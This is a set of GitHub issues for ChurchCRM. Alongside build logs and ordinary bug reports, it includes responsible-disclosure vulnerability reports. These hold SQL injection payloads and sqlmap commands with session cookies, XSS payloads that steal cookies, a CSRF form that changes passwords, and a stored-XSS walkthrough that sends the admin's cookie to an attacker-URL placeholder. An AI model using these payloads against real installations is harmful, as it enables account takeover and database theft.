npm ERR! gyp info using node-gyp@8.4.1
npm ERR! gyp info using node@18.16.0 | linux | arm64
npm ERR! gyp verb command rebuild []
npm ERR! gyp verb command clean []
npm ERR! gyp verb clean removing "build" directory
npm ERR! gyp verb command configure []
npm ERR! gyp verb find Python Python is not set from command line or npm configuration
npm ERR! gyp verb find Python Python is not set from environment variable PYTHON
npm ERR! gyp verb find Python checking if "python3" can be used
npm ERR! gyp verb find Python - executing "python3" to get executable path
npm ERR! gyp verb find Python - "python3" is not in PATH or produced an error
npm ERR! gyp verb find Python checking if "python" can be used
npm ERR! gyp verb find Python - executing "python" to get executable path
npm ERR! gyp verb find Python - "python" is not in PATH or produced an error
npm ERR! gyp ERR! find Python
npm ERR! gyp ERR! find Python Python is not set from command line or npm configuration
npm ERR! gyp ERR! find Python Python is not set from environment variable PYTHON
npm ERR! gyp ERR! find Python checking if "python3" can be used
npm ERR! gyp ERR! find Python - "python3" is not in PATH or produced an error
npm ERR! gyp ERR! find Python checking if "python" can be used
npm ERR! gyp ERR! find Python - "python" is not in PATH or produced an error
npm ERR! gyp ERR! find Python
npm ERR! gyp ERR! find Python **********************************************************
npm ERR! gyp ERR! find Python You need to install the latest version of Python.
npm ERR! gyp ERR! find Python Node-gyp should be able to find and use Python. If not,
npm ERR! gyp ERR! find Python you can try one of the following options:
npm ERR! gyp ERR! find Python - Use the switch --python="/path/to/pythonexecutable"
npm ERR! gyp ERR! find Python (accepted by both node-gyp and npm)
npm ERR! gyp ERR! find Python - Set the environment variable PYTHON
npm ERR! gyp ERR! find Python - Set the npm configuration variable python:
npm ERR! gyp ERR! find Python npm config set python "/path/to/pythonexecutable"
npm ERR! gyp ERR! find Python For more information consult the documentation at:
npm ERR! gyp ERR! find Python https://github.com/nodejs/node-gyp#installation
npm ERR! gyp ERR! find Python **********************************************************
npm ERR! gyp ERR! find Python
npm ERR! gyp ERR! configure error
npm ERR! gyp ERR! stack Error: Could not find any Python installation to use
npm ERR! gyp ERR! stack at PythonFinder.fail (/home/ChurchCRM/node_modules/node-gyp/lib/find-python.js:330:47)
npm ERR! gyp ERR! stack at PythonFinder.runChecks (/home/ChurchCRM/node_modules/node-gyp/lib/find-python.js:159:21)
npm ERR! gyp ERR! stack at PythonFinder.<anonymous> (/home/ChurchCRM/node_modules/node-gyp/lib/find-python.js:202:16)
npm ERR! gyp ERR! stack at PythonFinder.execFileCallback (/home/ChurchCRM/node_modules/node-gyp/lib/find-python.js:294:16)
npm ERR! gyp ERR! stack at exithandler (node:child_process:427:5)
npm ERR! gyp ERR! stack at ChildProcess.errorhandler (node:child_process:439:5)
npm ERR! gyp ERR! stack at ChildProcess.emit (node:events:513:28)
npm ERR! gyp ERR! stack at ChildProcess._handle.onexit (node:internal/child_process:289:12)
npm ERR! gyp ERR! stack at onErrorNT (node:internal/child_process:476:16)
npm ERR! gyp ERR! stack at process.processTicksAndRejections (node:internal/process/task_queues:82:21)
npm ERR! gyp ERR! System Linux 5.15.49-linuxkit
npm ERR! gyp ERR! command "/root/.nvm/versions/node/v18.16.0/bin/node" "/home/ChurchCRM/node_modules/node-gyp/bin/node-gyp.js" "rebuild" "--verbose" "--libsass_ext=" "--libsass_cflags=" "--libsass_ldflags=" "--libsass_library="
npm ERR! gyp ERR! cwd /home/ChurchCRM/node_modules/node-sass
npm ERR! gyp ERR! node -v v18.16.0
npm ERR! gyp ERR! node-gyp -v v8.4.1
npm ERR! gyp ERR! not ok
npm ERR! Build failed with error code: 1
npm ERR! A complete log of this run can be found in:
npm ERR! /root/.npm/_logs/2023-06-03T21_55_01_212Z-debug-0.log
```
#### On what page in the application did you find this issue?
#### On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?
docker desktop on mac
#### What browser (and version) are you running?
#### What version of PHP is the server running?
#### What version of SQL Server are you running?
#### What version of ChurchCRM are you running?
| Cannot build with error when npm run deploy in Docker environment | https://api.github.com/repos/ChurchCRM/CRM/issues/6494/comments | 0 | 2023-06-03T22:26:12Z | 2023-06-05T03:11:00Z | https://github.com/ChurchCRM/CRM/issues/6494 | 1,739,958,646 | 6,494 |
[
"ChurchCRM",
"CRM"
] | Hi CRM team,
Recently found some vulnerabilities on the latest ChurchCRM, here are the steps on how to reproduce it.
1. Log in as an admin and access the "Query Menu => Advanced Search" function

2. Enter the value and any field to search for and click Execute Query

3. Observe the request on Burp Suite, and modify the "searchstring" value to this payload: test'%2b(select*from(select(sleep(5)))a)%2b', and the application will sleep for 5 seconds

Impact:
Using auto exploitation tools such as sqlmap, an attacker can enumerate all information about the backend database.
Here are the details about my host:
- Version of CRM: 4.5.4
- Version of PHP: 7.4.33
- Version of MySQL/MariaDB: 10.4.27-MariaDB | SQL inject on the "Query Menu" function | https://api.github.com/repos/ChurchCRM/CRM/issues/6491/comments | 1 | 2023-06-01T14:29:05Z | 2023-10-21T21:54:48Z | https://github.com/ChurchCRM/CRM/issues/6491 | 1,736,454,863 | 6,491 |
[
"ChurchCRM",
"CRM"
] | **If you have the ChurchCRM software running, please file an issue using the _Report an issue_ in the help menu.**
#### On what page in the application did you find this issue?
PERSON PROFILE
#### On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?
SHARED LINUX
#### What browser (and version) are you running?
EDGE Version 112.0.1722.58
#### What version of PHP is the server running?
PHP 7.4
#### What version of SQL Server are you running?
5.7
#### What version of ChurchCRM are you running?
4.5.3
After editing a person that person shows up a second time.
Workflow: Family Z created and Mr A and Mrs B added.
Mr A edited. Person profile of Mr AZ or Mrs BZ now shows Family Members as Mr AZ, Mrs BZ, Mr AZ.
Mrs BZ edited. Person profile of Mr AZ or Mrs BZ now shows Family Members as Mr AZ, Mrs BZ, Mr AZ, Mrs BZ.
Deleting one record deletes all instances.
This also seems to affect adding group-specific properties to a person. The group-specific properties form no longer saves.
| After editing a person that person shows up twice in Family members in Person Profile. | https://api.github.com/repos/ChurchCRM/CRM/issues/6478/comments | 8 | 2023-04-26T13:41:54Z | 2023-10-21T22:23:22Z | https://github.com/ChurchCRM/CRM/issues/6478 | 1,685,062,050 | 6,478 |
[
"ChurchCRM",
"CRM"
] | When I try to add new event, the church crm software do not allow me to modify the event date/time.
Please resolve this bug.
PS: in the previously versions the problem does not exist!
| CAN'T CHANGE EVENT DATE/TIME WHEN ADDING NEW EVENT! | https://api.github.com/repos/ChurchCRM/CRM/issues/6477/comments | 2 | 2023-04-25T11:08:18Z | 2023-05-07T16:13:15Z | https://github.com/ChurchCRM/CRM/issues/6477 | 1,682,952,384 | 6,477 |
[
"ChurchCRM",
"CRM"
] | When I try to edit/delete an event from Listing All Church Events, the mouse hand is flickering.
I tried on laptop and iphone, on Chrome and Safari, on windows and mac OS, and the same problem!
Please resolve this bug.
PS: in the previously versions the problem does not exist!
| CAN'T EDIT OR DELETE EVENTS FROM Listing All Church Events | https://api.github.com/repos/ChurchCRM/CRM/issues/6476/comments | 1 | 2023-04-25T11:06:08Z | 2023-10-21T22:21:37Z | https://github.com/ChurchCRM/CRM/issues/6476 | 1,682,948,913 | 6,476 |
[
"ChurchCRM",
"CRM"
] | Hi team,
Recently, after reviewing the source code I found a vulnerability and here is a detailed description of it as follows.
# Bug: SQL injection
SQL injection in the file "EditEventAttendees.php" allows an attacker to control the query through parameters like "DelPerEventID" or "DelPerID" leading to delete any record as long as the user is authenticated user.
## PoC
REQUEST:
```
POST /churchcrm/EditEventAttendees.php HTTP/1.1
Host: localhost:8888
Cookie: CRM-c9a0dabf0a9b93872a36ca7d4b8dda4c=ltnr7t0cvi1knmm6doaels2h6s
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
Action=Delete&EID=1&EName=1&EDesc=foo&EDate=bar&DelPerEventID='&DelPerID=nothing
```
## Vulnerable code at EditEventAttendees.php#Line21
## Reason
The cause of the vulnerability is not sanitize user input and then inserting it straight into the query.
## Remedation
- Sanitize input parameters
- Use sql prepared statement
## Affected version: 4.5.4
Thank you for reading this report.
Regard. | SQL injection in ChurchCRM version 4.5.4 | https://api.github.com/repos/ChurchCRM/CRM/issues/6475/comments | 0 | 2023-04-25T08:18:13Z | 2023-05-07T16:03:37Z | https://github.com/ChurchCRM/CRM/issues/6475 | 1,682,672,392 | 6,475 |
[
"ChurchCRM",
"CRM"
] | **If you have the ChurchCRM software running, please file an issue using the _Report an issue_ in the help menu.**
#### On what page in the application did you find this issue?
/churchcrm/GroupReports.php
#### On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?
Linux
#### What browser (and version) are you running?
Firefox
#### What version of PHP is the server running?
7.4.33
#### What version of SQL Server are you running?
5.7.26
#### What version of ChurchCRM are you running?
4.5.3
Description:
XSS was detected in GroupReports.php, three hidden parameters were found in the code of this page, in which this vulnerability is possible: GroupRole, ReportModel, OnlyCart. A browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser.
Impact:
The vulnerability allows an attacker to send malicious JavaScript code which could result in hijacking of the user's cookie/session tokens , redirecting the user to a malicious webpage, downloading malicious files hosted on attackers server and performing many other unintended browser actions
Proof of Concept:
**<script>alert('XSS')</script>**


 | XSS exists in the group report page | https://api.github.com/repos/ChurchCRM/CRM/issues/6474/comments | 2 | 2023-04-21T19:07:58Z | 2023-11-05T01:05:42Z | https://github.com/ChurchCRM/CRM/issues/6474 | 1,678,971,305 | 6,474 |
[
"ChurchCRM",
"CRM"
] | **If you have the ChurchCRM software running, please file an issue using the _Report an issue_ in the help menu.**
#### On what page in the application did you find this issue?
I got issue CSVImport.php page.
#### On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?
Windows Server
#### What browser (and version) are you running?
Brave browser [Version 1.50.119 Chromium: 112.0.5615.121]
#### What version of PHP is the server running?
7.4.29
#### What version of SQL Server are you running?
Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
#### What version of ChurchCRM are you running?
v4.5.4
**Description:**
I found Cross site scripting (XSS) vulnerability in your ChurchCRM (v4.5.4) "Admin" menu to CSV Import page there Import data CSV uploader option. When I upload image file there malicious code inserted in image then the browser give me result. Because a browser can not know if the script should be trusted or not.
**CMS Version:**
v4.5.4
**Affected URL:**
http://127.0.0.1/churchcrm/CSVImport.php
**Steps to Reproduce:**
1. First login your admin panel.
2. Then click "Admin" menu and click "CSV Import" and you will get CSV file uploder option.

3. now insert xss payload in jpg file using exiftool or from image properties.

4. after then upload the jpg file.
5. you will see XSS pop up.

**Proof of Concept:**
You can see the Proof of Concept. Which I've attached screenshots and video to confirm the vulnerability.
https://user-images.githubusercontent.com/41516016/232332389-4fab27fc-e5a4-42cd-aae1-b7c4b60f975a.mp4
**Impact:**
Attackers can make use of this to conduct attacks like phishing, steal sessions etc.
Let me know if any further info is required.
Thanks & Regards
**Rahad Chowdhury**
Cyber Security Specialist
https://www.linkedin.com/in/rahadchowdhury/
| XSS via Image File | https://api.github.com/repos/ChurchCRM/CRM/issues/6471/comments | 4 | 2023-04-16T18:04:50Z | 2024-05-27T02:46:17Z | https://github.com/ChurchCRM/CRM/issues/6471 | 1,670,071,780 | 6,471 |
[
"ChurchCRM",
"CRM"
] | **If you have the ChurchCRM software running, please file an issue using the _Report an issue_ in the help menu.**
#### On what page in the application did you find this issue?
Login page
#### On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?
Shared Hosting (Linux)
#### What browser (and version) are you running?
Chrome (Version 111.0.5563.146 (Official Build) (x86_64))
#### What version of PHP is the server running?
v 7.3
#### What version of SQL Server are you running?
#### What version of ChurchCRM are you running?
V 4.5.4 | New installation Stuck on the login page | https://api.github.com/repos/ChurchCRM/CRM/issues/6467/comments | 5 | 2023-04-05T16:24:12Z | 2023-10-30T00:13:25Z | https://github.com/ChurchCRM/CRM/issues/6467 | 1,655,941,725 | 6,467 |
[
"ChurchCRM",
"CRM"
] | Hello dear friends, seems you have a lot of problems, here is one more:
Your parameter `EID` from `GetText.php` app is vulnerable to SQLi attacks and this is a critical moment for you, because
easily some malicious user can trick you and can steal all your information from your system.
So. enough from me. If you want to receive the exploit.py, please contact me!
All the best!
## Reference:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ChurchCRM/2023/ChurchCRM-4.5.3-121fcc1)
BR
| ChurchCRM-4.5.3-121fcc1 - SQLi | https://api.github.com/repos/ChurchCRM/CRM/issues/6451/comments | 2 | 2023-02-27T16:36:39Z | 2023-03-28T09:34:29Z | https://github.com/ChurchCRM/CRM/issues/6451 | 1,601,539,926 | 6,451 |
[
"ChurchCRM",
"CRM"
] | **If you have the ChurchCRM software running, please file an issue using the _Report an issue_ in the help menu.**
#### On what page in the application did you find this issue?
#### On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?
windows
#### What browser (and version) are you running?
Edge
#### What version of PHP is the server running?
7.4.3
#### What version of SQL Server are you running?
5.7.26
#### What version of ChurchCRM are you running?
4.5.3
Severity: middle
Description:
A stored XSS was found in the application editing group name, where malicious JS or HTML code can be inserted, allowing attackers to steal sensitive information, hijack user sessions, or perform other malicious operations on behalf of the victim. This vulnerability is caused by the lack of effective encoding processing of input and output in the background.
Impact:
Stored XSS, also known as persistent XSS, is a type of cross-site scripting attack in which the malicious code is permanently stored on the server and delivered to every user who accesses the affected page. The attacker typically injects the malicious code, such as JavaScript or HTML, into a form field or other input field that is stored in a database or other data storage location. When the victim accesses the page containing the stored malicious code, the code is executed in the victim's browser, allowing the attacker to steal sensitive information, hijack user sessions, or perform other malicious actions on behalf of the victim.
Affected Component:
/churchcrm/GroupList.php
Technical Details:
The vulnerability is caused by the failure of the backend to effectively validate user input. An attacker can insert malicious js code and store it in the database, allowing the attacker to steal sensitive information, hijack user sessions, or perform other malicious operations on behalf of the victim.
Proof of Concept (PoC):
`<img src=1 onclick=alert(document.cookie)>`

The vulnerability will trigger when another user visits the page

Remediation:
1.Input validation: All user input should be validated on the server-side to ensure that it conforms to the expected format and does not contain any malicious code. Input validation should be performed on both client-side and server-side, and should be designed to detect and block any attempts to inject scripts or other malicious content.
2.Output encoding: All data that is displayed on a web page should be properly encoded to prevent script injection. This includes data stored in a database or other data storage location, as well as data that is passed between pages or included in page templates. Proper encoding can include HTML entity encoding, URL encoding, or JavaScript escaping, depending on the specific context and data being displayed.
| A cross-site scripting vulnerability (XSS) exists in the edit group function | https://api.github.com/repos/ChurchCRM/CRM/issues/6450/comments | 6 | 2023-02-19T08:13:59Z | 2024-03-04T02:13:06Z | https://github.com/ChurchCRM/CRM/issues/6450 | 1,590,603,154 | 6,450 |
[
"ChurchCRM",
"CRM"
] |
#### On what page in the application did you find this issue?
https://github.com/ChurchCRM/CRM/blob/74042003a7cdad673bf56c7b6b43a0dabb3ac367/src/ChurchCRM/model/ChurchCRM/User.php#L109
#### On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?
Windows/xampp
#### What browser (and version) are you running?
Firefox
#### What version of PHP is the server running?
7.4.27
#### What version of SQL Server are you running?
7.4.27
#### What version of ChurchCRM are you running?
4.5.3
**Weak Salt Implementation**
The following report outlines a vulnerability found in the password storage system. The vulnerability arises from the use of a weak salt in the hashing algorithm, which could allow attackers to crack passwords more easily.
[Vulnerable Code: ](https://github.com/ChurchCRM/CRM/blob/74042003a7cdad673bf56c7b6b43a0dabb3ac367/src/ChurchCRM/model/ChurchCRM/User.php#L109)
`hash('sha256', $password . $this->getPersonId());`
Vulnerability Explanation:
The salt used in the hashing algorithm is generated by the $this->getPersonId() method. However, the method returns an integer value, which is not random or unique for each password. This makes the salt predictable and weak, and could allow attackers to use precomputed hash tables or dictionary attacks to crack the hashed passwords.
Impact:
The vulnerability could allow an attacker to crack passwords more easily, which could result in unauthorized access to user accounts and sensitive information.
Recommendation:
To address this vulnerability, it is recommended to use a more secure and unpredictable salt for each password, such as a random value generated for each password. This will make it more difficult for attackers to crack hashed passwords using precomputed hash tables or dictionary attacks.


| Weak Salt Implementation | https://api.github.com/repos/ChurchCRM/CRM/issues/6449/comments | 1 | 2023-02-12T14:43:47Z | 2023-02-16T00:25:20Z | https://github.com/ChurchCRM/CRM/issues/6449 | 1,581,285,056 | 6,449 |
[
"ChurchCRM",
"CRM"
] |
#### On what page in the application did you find this issue?
http://192.168.0.103/churchcrm/v2/user/2/changePassword
#### On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?
windows/xampp
#### What browser (and version) are you running?
firefox
#### What version of PHP is the server running?
7.4.27
#### What version of SQL Server are you running?
7.4.27
#### What version of ChurchCRM are you running?
4.5.3
Severity: High
Description:
A CSRF vulnerability was discovered in the Change Password functionality of the application, which could allow an attacker to change the password of any user without their knowledge or consent. The vulnerability is due to insufficient CSRF protection on the POST request used to change the password.
Impact:
An attacker can create a malicious website or a crafted HTML email, that when accessed by a victim who is authenticated in the application, will trigger an unauthorized password change. The attacker can craft a POST request with the necessary parameters and submit it through the victim's browser, leveraging the victim's session and authentication to execute the unauthorized action.
Affected Component:
POST /churchcrm/v2/user/2/changePassword
Technical Details:
The vulnerability is caused by the lack of CSRF tokens or other CSRF protections on the POST request used to change the password. As a result, an attacker can submit a crafted POST request to the application, which will be processed by the server as a legitimate request coming from an authenticated user.
Proof of Concept (PoC):
An attacker can create a simple HTML page that will submit the following POST request to the vulnerable endpoint:
```
<html>
<body>
<form action="http://192.168.0.103/churchcrm/v2/user/2/changePassword" method="POST">
<input type="hidden" name="NewPassword1" value="hacked123">
<input type="hidden" name="NewPassword2" value="hacked123">
<input type="submit" value="Submit">
</form>
</body>
</html>
```
When the victim accesses this page while being authenticated in the application, the POST request will be sent with the victim's session and authentication information, causing the victim's password to be changed to the attacker's chosen password.
Remediation:
To fix this vulnerability, the application should implement a strong CSRF protection mechanism that includes generating unique tokens for each user session and verifying those tokens on every POST request that modifies sensitive user data, such as changing passwords. Additionally, the application should avoid using GET requests to perform actions that modify state, such as changing a password, as this could expose the application to other types of attacks. | Cross-Site Request Forgery (CSRF) vulnerability in Change Password functionality | https://api.github.com/repos/ChurchCRM/CRM/issues/6448/comments | 5 | 2023-02-12T13:56:09Z | 2024-03-04T02:13:07Z | https://github.com/ChurchCRM/CRM/issues/6448 | 1,581,268,616 | 6,448 |
[
"ChurchCRM",
"CRM"
] | **If you have the ChurchCRM software running, please file an issue using the _Report an issue_ in the help menu.**
Sorry, but the link for "Report an Issue" only links back to the page you're on (linked to "#").
#### On what page in the application did you find this issue?
Under "Data Reports", "Query Menu", "Family Pledge by Fiscal Year"
#### On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?
Server Platform: Linux us-phx-web740.main-hosting.eu 4.18.0-348.lve.el8.x86_64 #1 SMP Sun Nov 21 10:56:33 EST 2021 x86_64
Shared Hosting
#### What browser (and version) are you running?
Microsoft Edge, Version 109.0.1518.70 (Official build) (64-bit)
#### What version of PHP is the server running?
v. 7.4.33
#### What version of SQL Server are you running?
5.5.5-10.5.15-MariaDB-cll-lve
#### What version of ChurchCRM are you running?
v. 4.5.3
#### Details
I have what seems to be a bug in the reports (specifically, regarding the "Family Pledge by Fiscal Year" report). I will tell you that I've dealt with php and web pages for years
When I set up a deposit, the "Fiscal Year" dropdown in the "Payment Details" page allows you to choose from a date range between 1997 to 2024. In looking at the values assigned for each year, it assigns an option value from 1 to 28. So:
<option value="0">Select Fiscal Year</option>
<option value="1">1997</option>
<option value="2">1998</option>
<option value="3">1999</option>
and so on. For 2023, the value assigned is "27".
The original SQL setup has the following in the Install.sql (in queryparameteroptions_gpo):
(10, 27, '2012/2013', '17'),
(11, 27, '2013/2014', '18'),
(12, 27, '2014/2015', '19'),
(13, 27, '2015/2016', '20'),
I've modified it so that it will register from 2020 to 2023, as our fiscal year follows the calendar year, as follows:
(10, 27, '2020', '17'),
(11, 27, '2021', '18'),
(12, 27, '2022', '19'),
(13, 27, '2023', '20'),
When I run the report, I never get any information back (I currently have five deposits so far for the year, with several "Pledges" registered, and several people having pledges registered for 2023 in the family account. The SQL query for the report, when selecting FY 2023, is:
SELECT fam_Name, fam_Envelope, b.fun_Name as Fund_Name, a.plg_amount as Pledge from family_fam left join pledge_plg a on a.plg_famID = fam_ID and a.plg_FYID=20 and a.plg_PledgeOrPayment='Pledge' and a.plg_amount>0 join donationfund_fun b on b.fun_ID = a.plg_fundID order by fam_Name, a.plg_fundID
The query is looking for "a.plg_FYID=20". In looking at queryparameteroptions_gpo, it doesn't appear to be referring to gpo_grp_ID, and if it's looking at gpo_Value, it's not finding it.
If there's something I'm missing (I need to make changes elsewhere, or I've completely gone off the rails), please let me know.
Thank you.
| Family Pledge by Fiscal Year report | https://api.github.com/repos/ChurchCRM/CRM/issues/6446/comments | 5 | 2023-02-02T18:21:29Z | 2023-12-23T02:01:48Z | https://github.com/ChurchCRM/CRM/issues/6446 | 1,568,551,827 | 6,446 |
[
"ChurchCRM",
"CRM"
] | Multiple stored Cross-site Scripting (XSS) vulnerabilities in ChurchCRM 4.5.3 and below allow authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected text fields. The following API and parameters are not filtered and sanitized user input:
1. /api/calendars (front-end: /v2/calendar, through "add new calendar")
- Parameter: Name

2. /api/groups (front-end: /sundayschool/SundaySchoolDashboard.php, through "Add New Class")
- Parameter: groupName

3. /api/groups/{groupID:[0-9]+} (front-end: /GroupEditor.php?GroupID={groupID}, which groupID is generated through create new sunday school class in number 2)
- Parameters: groupName, description
 | Multiple Stored XSS vulnerabilities in ChurchCRM 4.5.3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6444/comments | 1 | 2023-01-29T14:46:49Z | 2023-11-01T18:02:52Z | https://github.com/ChurchCRM/CRM/issues/6444 | 1,561,318,386 | 6,444 |
[
"ChurchCRM",
"CRM"
] | A Stored XSS vulnerability was discovered in ChurchCRM 4.5.3 and below allow unauthenticated attacker can inject malicious XSS via "Register a new Family" feature. Almost parameters in api **/api/public/register/family** were not filtered and sanitized user input in backend.
PoC Video: [https://youtu.be/nrBGcsTtGCs](https://youtu.be/nrBGcsTtGCs)
Step to reproduce:
1. On attacker machine, listen and serve this javascript file

2. Login as admin
3. Navigate to **Admin -> Edit General Settings (/SystemSettings.php) -> People Setup**, set **bEnableSelfRegistration** to **True**

4. Open a new private windows to register a new family by navigating to /external/register/. In "Family Name" field, invoke the payload: **<script src="//{URL}/foo.js"></script>** which URL is the attacker server that served the javascript on step 1

5. Register a new family as normal behavior until receiving the success message

6. Comeback to admin's browser, move to dashboard to trigger and malicious script

7. On attacker machine, you will see the returned cookie from admin session
 | ChurchCRM 4.5.3 Stored XSS to Admin Takeover | https://api.github.com/repos/ChurchCRM/CRM/issues/6443/comments | 1 | 2023-01-29T14:33:16Z | 2023-02-09T02:48:34Z | https://github.com/ChurchCRM/CRM/issues/6443 | 1,561,314,007 | 6,443 |
[
"ChurchCRM",
"CRM"
] | By default, fields are sanitized and filtered to prevent malicious HTML code. However, by using CSV Import feature, I can create new Person and Family with XSS payload in "First Name" field (maybe other fields are also affected using this feature)
Step to reproduce:
1. Create a CSV file that contains malicious javascript in "Last Name" field, for example:
[test.txt](https://github.com/ChurchCRM/CRM/files/10506131/test.txt)
2. Login as admin
3. Navigate to Admin -> CSV Import (Endpoint: /CSVImport.php), upload created CSV file in step 1
4. In preview before importing, the XSS payload will be displayed

5. Choose the field "Last Name" as malicious XSS payload, tick "Ignore first CSV row (to exclude a header)" and "Make Family records based on last name and address" checkboxes and then click "Perform Import" button

6. Navigate to "Dashboard" (/v2/dashboard) to view the result

7. In Family detail and Person detail, it also execute XSS payload


| Stored XSS via CSV Import in ChurchCRM 4.5.3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6442/comments | 1 | 2023-01-26T03:41:34Z | 2023-02-09T02:42:57Z | https://github.com/ChurchCRM/CRM/issues/6442 | 1,557,592,741 | 6,442 |
[
"ChurchCRM",
"CRM"
] | I found multiple SQL Injection vulnerabilities in "Event" parameter both GET and POST request in "Event Attendance reports" feature (EventAttendance.php)
**Step to exploit the "Event" parameter in GET request:**
1. Login as admin
2. Add new Church Event (via endpoint /EventEditor.php)
3. Navigate to Events -> Event Attendance Reports (EventAttendance.php)
4. Click on the event created on step 2 to get the corresponding URL

5. Copy the URL in step 4, and run sqlmap and invoke the "Event" as a vulnerable parameter: `sqlmap -u "http://192.168.200.160/EventAttendance.php?Action=List&Event=1&Type=Church%20Service" -p Event --random-agent --risk 3 --level 5 --dbms=mysql --headers="Cookie: CRM-26492cf61ac7544df2c69e80a1beb245=9tnofsklpepe5sp12i80b0bbcs" --dbs`

**Step to exploit the "Event" parameter in POST request:**
1. Login as admin to get the Cookie header
2. Run the following command in sqlmap (with the post data is **Action=Retrieve&Event=1&Choice=Guests**): `sqlmap -u "http://192.168.200.160/EventAttendance.php" --headers="Cookie: CRM-26492cf61ac7544df2c69e80a1beb245=9tnofsklpepe5sp12i80b0bbcs" --data="Action=Retrieve&Event=1&Choice=Guests" -p Event --random-agent --risk 3 --level 5 --dbms=mysql --dbs`

| Multiple SQL Injection vulnerabilities in ChurchCRM 4.5.3 in "Event Attendance reports" feature | https://api.github.com/repos/ChurchCRM/CRM/issues/6441/comments | 1 | 2023-01-25T10:05:24Z | 2023-02-09T02:39:49Z | https://github.com/ChurchCRM/CRM/issues/6441 | 1,556,373,233 | 6,441 |
[
"ChurchCRM",
"CRM"
] | SQL Injection vulnerability in ChurchCRM 4.5.3 via GetText.php in EID parameter
Step to exploit:
1. Login as admin
2. Add new Church Event (via endpoint /EventEditor.php)
3. Navigate to "List Church Events" (via endpoint: /ListEvents.php) the view the created Church Event in step 2
4. On page "Listing All Church Events", click on "Sermon Text" in decription field to get the Event ID (EID) value and the corresponding URL

5. Run SQLmap with the Cookie headers: `sqlmap -u "http://192.168.200.160/GetText.php?EID=1" -p EID --random-agent --risk 3 --level 5 --dbms=mysql --headers="Cookie: CRM-26492cf61ac7544df2c69e80a1beb245=9tnofsklpepe5sp12i80b0bbcs"`


6. Print out the databases: `sqlmap -u "http://192.168.200.160/GetText.php?EID=1" -p EID --random-agent --risk 3 --level 5 --dbms=mysql --headers="Cookie: CRM-26492cf61ac7544df2c69e80a1beb245=9tnofsklpepe5sp12i80b0bbcs" --dbs`
 | SQL Injection vulnerability in ChurchCRM 4.5.3 in GetText.php | https://api.github.com/repos/ChurchCRM/CRM/issues/6440/comments | 1 | 2023-01-25T09:11:52Z | 2023-02-09T02:36:34Z | https://github.com/ChurchCRM/CRM/issues/6440 | 1,556,294,908 | 6,440 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/v2/calendar
Screen Size |600x800
Window Size |720x1259
Page Size |821x1259
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6439/comments | 0 | 2023-01-25T07:26:34Z | 2023-02-07T08:50:36Z | https://github.com/ChurchCRM/CRM/issues/6439 | 1,556,173,610 | 6,439 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/v2/calendar?pageName=%2fv2%2fcalendar
Screen Size |600x800
Window Size |720x1259
Page Size |821x1259
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6438/comments | 0 | 2023-01-25T07:26:13Z | 2023-02-07T08:50:36Z | https://github.com/ChurchCRM/CRM/issues/6438 | 1,556,173,314 | 6,438 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/GroupList.php?%22%2bnetsparker(0x00A864)%2b%22
Screen Size |600x800
Window Size |720x1280
Page Size |720x1280
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
